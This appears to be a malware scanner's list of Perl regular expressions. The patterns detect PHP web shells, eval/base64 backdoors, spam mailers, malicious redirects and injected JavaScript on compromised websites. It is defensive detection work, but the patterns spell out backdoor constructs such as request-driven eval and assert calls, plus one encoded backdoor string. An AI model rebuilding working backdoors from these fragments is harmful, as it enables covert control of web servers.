qr/\#\!\/usr\/bin\/python\s+import\s+zlib\,\s+base64\s+eval\(compile\(zlib\.decompress\(base64\.b64decode\(.+?\)\)\,\'<string>\'\,\'exec\'\)\)/is,
qr/<center><H2>\s+<SCRIPT>.+?function\s+string2array\(text\).+?while\(farben\.length<text\.length\).+?\/\/document\.write\(text\)\;\s+<\/SCRIPT><\/H2><\/center>/is,
qr/<\!DOCTYPE.+?Stupidc0de\s+Shell.+?\+\s+copyright\s+\+.+?<\/div>\s+<\/BODY><\/html>/is,
qr/<\?php.+?\$me\s+\=\s+basename\(\_\_FILE\_\_\)\;\s+\$cookiename\s+\=.+?ours\s+\:\-\)\s+exit\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\)\s+or\s+die\;\/\*\'\..+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$.+?\'\;/is,
qr/<\?php\s+\$sh\_name\s+\=\s+\"x0rg\-Bypass\s+w0rms\.com\"\;.+?Restricted\s+Area.+?capriv8exit\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\)die\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20}).+?\$\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\&\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\(\/\*.+?\)\)eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\(([A-z0-9]{1,20})\.\'@\'\..+?\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\/\*.+?\)\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;.+?\'\;/is,
qr/<\?php\s+\$OO00O0\=\d\;eval\(gzinflate\(base64\_decode\(str\_rot13\(.+?\)\)\)\)\;\?>/is,
qr/<\?php\s+\$OO00O0\=\d\;eval\s+\(gzinflate\s+\(base64\_decode\s+\(str\_rot13\s+\(.+?\)\)\)\)\;\?>/is,
qr/RewriteRule\s+\^g\(\\d\+\)\[\-\/\]\.\*.+?RewriteRule\s+\^v\(\\d\+\)\[\-\/\]\.\*.+?RewriteRule\s+\^\.\*\[\-\/\]g\(\\d\+\)\[\-\/\]v\(\\d\+\)\[\-\/\]\.\*\$\s+index\\\.php\?id\=\$1\-\$2\&\%\{QUERY\_STRING\}\s+\[L\]/is,
qr/<\?php.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\@unlink\(\"1\.sh\"\)\;\s+\?>/is,
qr/<\?php.+?function\s+getDirContents\(\$dir\)\s+\{.+?if\(unlink\(\$path\.\'\/wp\-admin\/update\-core\.php\'\)\)\s+\{.+?\}\s+\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\{\$([A-z0-9]{1,10})\s+\=\s+\'\'\;\s+for\(\$([A-z]{1,2})\=0\;\s+\$([A-z]{1,2})\s+\<\s+strlen\(\$([A-z0-9]{1,10})\)\;\s+\$([A-z]{1,2})\+\+\)\{\$([A-z0-9]{1,10})\s+\.\=\s+isset\(\$([A-z0-9]{1,10})\[\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\]\)\s+\?\s+\$([A-z0-9]{1,10})\[\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\]\s+\:\s+\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\;\}\s+\$([A-z0-9]{1,10})\=\"base64\_decode\"\;return\s+\$([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\}.+?\$([A-z]{1,2})\s+\=\s+\Array\(.+?eval\(([A-z0-9]{1,10})\(\$([A-z]{1,2})\,\s+\$([A-z]{1,2})\)\)\;\?>/is,
qr/<\?php\s+eval\(gzuncompress\(\".+?\"\)\)/is,
qr/<\?php\s+\$([A-z0-9]{1,10})\=\'aWYoaXNzZXQoJF9SRVFVRVNUWydjb2NvJ10pICYmICRfUkVRVUVTVFsnY29jbyddIT0nJyl7ZXZhbCgkX1JFUVVFU1RbJ2NvY28nXSk7ZXhpdCgpO30\=\'\;eval\(base64\_decode\(\$([A-z0-9]{1,10})\)\)\;exit\(\)\;\s+\?>/is,
qr/<\?php\s+chmod\(get\_root\_path\(\)\,\s+0755\)\;.+?function\s+get\_root\_path\(\).+?die\(\$reason\)\;\s+\}/is,
qr/<html>\s+<title>1962Cracker\s+\|\s+cPanel\s+Cracker\s+\&\s+Root\s+Server\.\.\.\|<\/title>.+?<\?php\s+eval\(base64\_decode\(.+?<\/Script>/is,
qr/<\?php.+?\$wp\_file\_descriptions\s+\=\s+array\(.+?\$wp\_template\s+\=\s+\@preg\_replace\(\"\/\(\[a\-z0\-9\-\%\]\+\)\.\(\[a\-z\-\@\]\+\)\.\(\[a\-z\]\+\)\/.+?\$2\(\$3\(urldecode\(\'\$1\'\)\)\)\"\,\s+\$search\.\"\.\@\"\.\$wp\_file\_descriptions\[\'rtl\.css\'\]\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_REQUEST\[\"q\"\]\)\s+AND\s+\$\_REQUEST\[\"q\"\]\=\=\"1\"\)\{echo\s+\"200\"\;\s+exit\;\}\s+if\(isset\(\$\_POST\[\"key\"\]\)\s+\&\&\s+isset\(\$\_POST\[\"chk\"\]\)\s+\&\&\s+\$\_POST\[\"key\"\]\=\=\".+?\"\)eval\(gzuncompress\(base64\_decode\(\$\_POST\[\"chk\"\]\)\)\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?eval\/\*i\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\)\;\s+\}/is,
qr/<\?php\s+eval\(gzuncompress\(.+?\"\)\)\;/is,
qr/<\?php.+?class\s+JApplication.+?new\s+JApplication\(array\s+\(\'UID\'\s+\=>\s+\'([A-z0-9]{1,20})\'\)\)\;/is,
qr/<\?php\s+\/\*\s+\@package\s+WordPress\s+\*\/\s+eval\(base64\_decode\(\@\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?\)\)\;\s+\}/is,
qr/<\?php\s+\$dom\s+\=\s+array\(.+?\$url\s+\=\s+\'http\:\/\/\'\.\$dom\[mt\_rand\(0\,sizeof\(\$dom\)\-1\)\]\.\'\/file\.php\'\;.+?header\(\'Location\:\s+\'\.\$url\)\;\s+\}\s+exit\;\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\"id\"\]\)\)\s+header\(.+?\.\$\_GET\[\"id\"\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(base64\_decode\(.+?\)\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?functions+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\{return\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\}\;.+?\}\(\$url\,\s+FALSE\,\s+\$\{([A-z0-9]{1,20})\(.+?return\s+\$\{.+?\)\}\;\s+\}/is,
qr/<\?php\s+eval\(base64\_decode\(.+?include.+?x70hp\"\;.+?include.+?x70hp\"\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?\)\;\s+\?>/is,
qr/\*\/\s+eval\(base64\_decode\(\"aWY.+?\=\"\)\)\;\s+\/\*/is,
qr/\*\/include\s+\/\*/is,
qr/\*\/\".+?\.co.+?php\"\;\/\*/is,
qr/<\?\s+\$([A-z0-9]{1,3})\[1\]\=\"([A-z0-9]{1,20})\.html\"\;\$([A-z0-9]{1,3})\[1\]\=.+?file\_put\_contents\(\$fileaddr\,gzuncompress\(base64\_decode\(\$([A-z0-9]{1,3})\[\$([A-z0-9]{1,3})\]\)\)\)\;\}\s+unlink\(\$scr\.\"\.php\"\)\;\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?exit\(\$\{([A-z0-9]{1,20})\(\"lie\=\=\?\"\)\}\)\;\s+\}/is,
qr/eval\(base64\_decode\(\"aWY.+?include.+?eval\(base64\_decode\(\"aWY.+?include.+?ephp\"\;/is,
qr/<\?php\s+\/\*\s+ionCube24\s+encoder\s+\*\/\s+global.+?eval\(base64\_decode\(.+?\_\_halt\_compiler\(\)\;([A-z0-9]{250,})/is,
qr/<\?\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$([A-z0-9]{1,20})\s+\=\s+\'pr\'\.\'eg\'\.\'\_r\'\.\'epl\'\.\'ace\'\;.+?\@\$([A-z0-9]{1,20})\(\'\#\#e\'\,.+?\'\'\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?\Z/is,
qr/<script\s+type\=\"application\/javascript\">var\s+toggleMenu\s+\=\s+function\(\).+?getCookie\(\"ytm\_hit1\"\)\&\&\(setCookie\(\"ytm\_hit1\"\,1\,1\)\,1\=\=getCookie\(\"ytm\_hit1\"\).+?\/script>\'\)\)\)\;<\/script>/is,
qr/<\?php\s+if\(isset\(\$\_POST\[chr\(100\).+?<h1>Object\s+not\s+found\!<\/h1>.+?<h2>Error\s+404<\/h2>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=chr\(97\)\.chr\(117\)\.\"t\"\.chr\(104\)\.\"\_\"\.\"p\"\.\".+?\"\.\"s\"\.chr\(115\)\;.+?\)\)\;\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#/is,
qr/<\?\s+\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\=Array\(base64\_decode\(.+?return.+?round\(.+?\)\;\}/is,
qr/<IfModule\s+mod\_rewrite\.c>\s+RewriteEngine\s+On\s+RewriteCond\s+\%\{HTTP\_REFERER\}\s+\^\.\*\(google\|ask\|yahoo.+?\/index\_backup\.php\?query\=\$1\s+\[QSA\,L\]\s+<\/IfModule>/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\'jpg\'\]\)\)\s+\{\s+header\(\s+\'Content\-Type\:\s+image\/jpeg\'\s+\)\;\s+readfile\(\'http\:\/\/.+?\.jpg\'\)\;\s+\exit\(\)\;\s+\}\s+header\(\'Location\:\s+http\:\/\/.+?\'\)\;\s+exit\(\)\;/is,
qr/function\s+l\_\_1\(\$.+?function\s+l\_\_3\(\$\_2\)\{if\(\$GLOBALS\[\Z/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\'jpg\'\]\)\).+?\)\;\s+exit\(\)\;/is,
qr/<\?php\s+define\(\'URL\_HEADER\_NAME\'\,\s+\"X\-Upstream\-Url\"\)\;\s+define\(\'DEBUG\_HEADER\_NAME\'\,\s+\"X\-Debug\-Oleg\"\)\;.+?else\s+if\(strcasecmp\(\$h\,\s+\$key\)\s+\=\=\s+0\)\s+unset\(\$headers\[\$h\]\)\;\s+\}\s+\}/is,
qr/<\?php\s+\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\=Array\(base64\_decode\(.+?return\s+base64\_decode\(\$a\[\$i\]\)\;\}.+?\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\[.+?\s+exit\(\)\;\Z/is,
qr/<\?php\s+\$ua\s+\=\s+\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\;\s+if\s+\(preg\_match\(\'\/facebook\/si\'\,\$ua\)\)\s+\{.+?<\/noframes>\s+<\/html>\'\;\s+\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?\.php\_uname\(\)\..+?<\/form>/is,
qr/\'\;if\(\s+\$\_POST\[\'\_upl\'\].+?<\/form>/is,
qr/<\?php\s+if\(\!empty\(\$\_FILES\[\'message\'\]\[\'name\'\]\).+?<\/body>\s+<\/html>\'\;\/\/([0-9]{1,20})/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\_\"\.\'G\'\.\'E\'\.\'T\'\;\s+if\s+\(isset\(.+?preg\_replace\(.+?header\(\'Location\:\s+http\:\/\/.+?exit\(\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?if\s+\(\(strstr\(\$([A-z0-9]{1,20})\,\".+?\"\)\)\s+or\s+\(strstr\(([A-z0-9]{1,20})\}\[.+?\)rtolower\(\$\_SERVER\[.+?\)\s+\&\&\s+\(\!isset\(\$GLOBALS\[.+?if\(\(function\_exists\(.+?\)\)\s+or\s+\(strstr\(\$.+?\(0\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+implode\(array\_.+?\)\{return\s+chr\(ord\(\$n\)\-1\)\;\}\s+\@error\_reportin.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+=.+?\$uas\=strtolower\(.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\".+?\/\*([A-z0-9]{1,10})\*\/\s+echo\s+file\_get\_contents\(\'.+?\'\)\;/is,
qr/function\s+l\_\_1\(\$\_\Z/is,
qr/<\?php\s+if\(\!empty\(\$\_FILES\[\'message\'\]\[\'name\'\]\)\s+\&\&\s+\(md5\(\$\_POST\[\'name\'\]\).+?Message\s+sent\!<\/body>\s+<\/html>\'\;/is,
qr/<\?php\s+\$report\_url\s+\=\s+\$\_POST\[\'url\'\]\;\s+\$pass\s+\=\s+\$\_POST\[\'pass\'\]\;\s+\$list\s+\=\s=\$\_POST\[\'list\'\]\;.+?if\s+\(\@stripos\(\$hello\,\'\+OK\'\)\!\=\=false\)\s+\{\s+return\s+true\;\s+\}\s+return\s+false\;\s+\}/is,
qr/<\?php\s+\/\*\s+<\!\-\-\s+WordPress\s+SEO\s+Plugin\s+\-\->\s+\*\/\s+eval\(gzuncompress\(base64_decode\(.+?\)\)\)\;\s+\/\*\s+<\!\-\-\s+End\s+WordPress\s+SEO\s+Plugin\s+\-\->\s+\*\/\s+\?>/is,
qr/\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\".+?\"\;\s+\/\*([A-z0-9]{1,10})\*\//is,
qr/<\?PHP\s+if\(isset\(\$\_REQUEST\[\"cmd\"\]\)\)\{eval\(stripslashes\(\$\_REQUEST\[\"cmd\"\]\)\)\;die\(\)\;\}\s+\?>/is,
qr/<\?php\s+\$auth_pass.+?\$color.+?\$default\_action\s+\=\s+\'FilesMan\'\;\s+\$default\_use\_ajax\s+\=\s+true\;\s+\$default\_charset\s+\=\s+\'Windows\-1251\'\;\s+if\(\!empty\(\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\)\)\s+\{\s+\$userAgents\s+\=\s+array\(\"Google\"\,\s+\"Slurp\"\,\s+\"MSNBot\"\,\s+\"ia\_archiver\"\,\s+\"Yandex\"\,\s+\"Rambler\"\)\;\s+if\(preg\_match\(\'\/\'\s+\.\s+implode\(\'\|\'\,\s+\$userAgents\)\s+\.\s+\'\/i\'\,\s+\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\)\)\s+\{\s+header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<\?php.+?\$auth_pass.+?\$color.+?\$default_action\s+\=\s+\'FilesMan\'\;.+?\)\;\?>/is,
qr/<\?php\s+\$\{.+?\,NULL\)\;\@ini\_set\(\"log\_.+?\;return\s+sh\_decrypt\_phase\(sh\_decrypt\_phase\(\$\{\$\{.+?\=>\@phpversion\(\)\,.+?\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\$\{.+?\)\{if\(is\_uploaded\_file\(.+?\)\;\s+\?>/is,
qr/<\?php\s+eval\(.+?x3B\"\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\s+WordPress.+?eval\(gz.+?\$x([A-z0-9]{1,10})\s+\,\"([0-9]{1,5})\"\)\;/is,
qr/<\?php\s+\$noc\s+=\s+\".+?\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\].+?\$noc\[([0-9]{1,3})\]\.\$([A-z0-9]{1,10})\;\@\$([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\?>/is,
qr/<\?php\s+\/\/function\s+M404\s+\(\)\{.+?\$strings\s+\=\s+explode\(\'\|\'\,\s+base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(\$value\)\)\)\)\)\)\)\)\)\;.+?echo\s+\'\#\#\#\#\#\'\.\s+\$result\s+\.\s+\'\*\*\*\*\*\'\;\s+exit\;/is,
qr/<\?php\s+\$action\=\$\_REQUEST\[\'action\'\]\;\s+\/\/status.+?echo\s+\"File\s+does\s+not\s+exist\"\;\s+\}\s+\?>/is,
qr/<\?php\s+\$p\s+\=\s+\$\_REQUEST\[\"m\"\]\;\s+eval\(base64\_decode\(\$p\)\)\;\s+\?>/is,
qr/\/\*edition\:1\.6\*\/.+?\;eval\(gzuncompress\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=call\_user\_func\(.+?\)\;\s+\$([A-z0-9]{1,20})\=call\_user\_func\(.+?\)\;\s+eval\(\$([A-z0-9]{1,20})\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\".+?\"\;\$([A-z0-9]{1,20})\=call\_user\_func\(\$.+?\)\;\$([A-z0-9]{1,20})\=call\_user\_func\(\$.+?\)\;eval\(\$([A-z0-9]{1,20})\)\;/is,
qr/var\s+\_0xaae8\=\[\"\"\,\".+?\"\]\;document\[\_0xaae8\[5\]\]\(\_0xaae8\[4\]\[\_0xaae8\[3\]\]\(\_0xaae8\[0\]\)\[\_0xaae8\[2\]\]\(\)\[\_0xaae8\[1\]\]\(\_0xaae8\[0\]\)\)/is,
qr/<\?php\s+eval\(gzuncompress\(base64\_decode\(.+?\=\=\'\)\)\)\;/is,
qr/<\?php\s+\$report\_url\s+\=\s+\$\_POST\[\'url\'\]\;\s+\$pass\s+\=\s+\$\_POST\[\'pass\'\]\;\s+\$list\s+\=\s+\$\_POST\[\'list\'\]\;.+?if\s+\(\@stripos\(\$hello\,\'\+OK\'\)\!\=\=false\)\s+\{\s+return\s+true\;\s+\}\s+return\s+false\;\s+\}/is,
qr/A<\?php\s+\$license\s+\=\s+str\_rot13\(\'n\'\.\'f\'\.\'f\'\.\'r\'\.\'e\'\.\'g\'\)\;\s+\$license\(\$\_POST\[\'info\'\]\)\;\s+\?>/is,
qr/<\?php\s+preg\_replace\(\"\/\.\/.+?\)\)\)\;\"\,\"\.\"\)\;/is,
qr/<\?php\s+\$file.+?function\s+dwnld\(\$file\)\s+\{.+?header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;\s+exit\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?explode\(chr\(\(.+?\$([A-z0-9]{1,20})\=\(([0-9]{1,4})\-([0-9]{1,4})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors.+?bad\_agents\s+\=\s+\'\~google.+?register\_shutdown\_function\(\'ob\_end\_flush\'\)\;\s+\}\s+\}\s+\?>/is,
qr/<html>\s+<head>\s+<title>Hacked\s+by\s+ZeDaN\-Mrx.+?<\/iframe>\s+<\/html>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\).+?eval.+?exit\(\)\;\}\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+\'0\'\)\;\s+error\_reporting\(0\)\;\s+\$skipme\s+\=\s+false\;\s+\$bad\_agents\s+\=\s+\'\~google.+?<\/script>\"\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$q\=\"asser\"\.\"t\"\;\$q\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\!DOCTYPE\s+html\s+PUBLIC.+?rainbow\.arch\.scriptmania\.com.+?height\=\"1\"\s+width\=\"1\"><\/embed>\s+\<\/html>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$P\=\/\*([A-z0-9]{1,20})\*\/\"ass\"\.\"ert\"\;\$\W\=\$P\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}/is,
qr/include\_once\s+\"3732787075626C69635F68746D6C\.htm\"\;/is,
qr/bgeteam\s+<\?php\s+error\_reporting\(0\)\;\s+if\(isset\(\$\_GET\[bge\]\)\).+?else\{echo\"<b>\"\;\}\}\}\s+\?>/is,
qr/<\?php\s+\$k=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'wei\'\]\)\;\?>/is,
qr/<\?php\s+function\s+result\(\$data\)\s+\{\s+\$result\=implode\(.+?\$result\=preg\_replace\(.+?if\(isset\(\$\_COOKIE\[\'google\'\]\)\).+?echo\(result\(array\(.+?\?>/is,
qr/<\?php.+?\$e19\s+\=.+?include\_once\(\$H26\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+mail\(stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\)\;\s+if\(\$([A-z0-9]{1,20})\)\{echo\s+\'([A-z0-9]{1,20})\'\;\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+eval\(eval\(\".+?\;\}\s+else\s+\{.+?\}\"\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\s+\*\s+\@package.+?if\s+\(empty\s+\(\$\_POST\)\)\s+\{\s+echo\s+\'Empty\s+data\.\'.+?array\_map\s+\(.+?\$\_POST\[\'([A-z0-9]{1,5})\'\]\)\s+\)\)\;/is,
qr/<\?php\s+\@require\(\'wp\-admin\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+echo\s+\'([0-9]{1,20})\.txt\'\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\}/is,
qr/<html>\s+<head>\s+<meta\s+http\-equiv\=\"refresh\"\s+content\=\"1\;url\=http\:\/\/([A-z0-9]{1,20})\.([A-z0-9]{1,20})\/\">\s+<\/head>\s+<body>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\s+\@require\(\'wp-admin\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$\_([A-z0-9]{1,20})\s+\=.+?\;\s+for\s+\(\$i\s+\=\s+0\;\s+\$i\s+<\s+strlen\(\$\_([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\s+\$\_([A-z0-9]{1,20})\s+\.\=\s+sprintf\(.+?\$\'\_([A-z0-9]{1,20})\(\)\;\s+\/\*([A-z0-9]{1,100})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"http\:\/\/([A-z0-9]{1,20})\.([A-z0-9]{1,20})\/.+?\.php\"\;\s+\$([A-z0-9]{1,20})\=1\;\s+header\(\"content\-type\:text\/html\;charset\=utf\-8\"\)\;\@date\_default\_timezone\_set\(\"America\/Grenada\"\).+?break\;case\s+1\:\$([A-z0-9]{1,20})\=.+?return\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$\_([A-z0-9]{1,20})\s+\=.+?\/\*([A-z0-9]{1,100})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=([0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\=([0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\=\'http\:\/\/.+?else\{global\$([A-z0-9]{1,20})\;return\s+strlen\(.+?return\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+\@require\(\'\.\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+\@\'\$\s+([A-z0-9]{1,20})\=([0-9]{1,20})\s+([A-z0-9]{1,20})\=([0-9]{1,20}).+?\=http\:\/\/([A-z0-9]{1,20}).([A-z0-9]{1,50})\/([A-z0-9]{1,20})\.php\s+cache\=([0-9]{1,10}).+?\=explode\(.+?([A-z0-9]{1,20})\!\=\'\'\)\{echo\s+\$GLOBALS\[\"([A-z0-9]{1,20})\"\]\(\$([A-z0-9]{1,20})\)\;\}\}([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)die\(pi\(\)\*6\)\;\$\{.+?;eval\(\$\{\$([A-z0-9]{1,20})\}\[\".+?\"\]\)\;\}exit\(\)\;\}\?>/is,
qr/<\?php\s+\@\'\$.+?\=http\:\/\/([A-z0-9]{1,20}).([A-z0-9]{1,50})\/([A-z0-9]{1,20})\.php\s+cache\=([0-9]{1,10}).+?exit\(\)\;\}else\{return\;\}\}([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}.+?function\s+([A-z0-9]{1,20})\(\)\{\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,100})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,100})\"\;\s+return\s+\"\{\$([A-z0-9]{1,20})\}\{\$([A-z0-9]{1,20})\}\"\;\s+\}\s+\?>/is,
qr/<\?php\s+\$alphabet\s+\=.+?\$string\s+\=.+?\$array\_name.+?\$f\(\)\;/is,
